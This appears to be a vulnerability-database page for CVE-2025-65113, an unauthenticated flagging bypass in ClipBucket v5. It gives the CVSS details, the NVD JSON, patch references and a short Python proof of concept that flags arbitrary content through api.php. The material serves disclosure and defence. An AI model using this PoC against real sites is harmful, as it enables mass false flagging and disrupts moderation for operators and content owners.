Security Vulnerability Report
中文
CVE-2025-65113 CVSS 6.5 MEDIUM

CVE-2025-65113

Published: 2025-11-29 01:16:03
Last Modified: 2025-12-03 21:51:04
Source: [email protected]

Description

ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.2 - #164, an authorization bypass vulnerability in the AJAX flagging system allows any unauthenticated user to flag any content (users, videos, photos, collections) on the platform. This can lead to mass flagging attacks, content disruption, and moderation system abuse. This issue has been patched in version 5.5.2 - #164.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:oxygenz:clipbucket:*:*:*:*:*:*:*:* - VULNERABLE
ClipBucket v5 < 5.5.2-164

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-65113 PoC - ClipBucket v5 Authorization Bypass in AJAX Flagging # Target: ClipBucket v5 instances # Description: Unauthenticated users can flag any content on the platform target_url = "http://target-server/upload/api.php" def flag_content(content_id, content_type): """Flag arbitrary content without authentication""" params = { "mode": "flag", "type": content_type, "id": content_id } response = requests.get(target_url, params=params) return response.status_code == 200 # Example usage flag_content("123", "video")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65113", "sourceIdentifier": "[email protected]", "published": "2025-11-29T01:16:02.640", "lastModified": "2025-12-03T21:51:03.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.2 - #164, an authorization bypass vulnerability in the AJAX flagging system allows any unauthenticated user to flag any content (users, videos, photos, collections) on the platform. This can lead to mass flagging attacks, content disruption, and moderation system abuse. This issue has been patched in version 5.5.2 - #164."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oxygenz:clipbucket:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3", "versionEndExcluding": "5.5.2-164", "matchCriteriaId": "218EBAD4-E4C5-4C47-86FA-B3EC7B585553"}]}]}], "references": [{"url": "https://github.com/MacWarrior/clipbucket-v5/commit/a83b807e592f85d98f1f156bd3cbb1ffcc230233", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-9f8v-vph8-pq6q", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-9f8v-vph8-pq6q", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.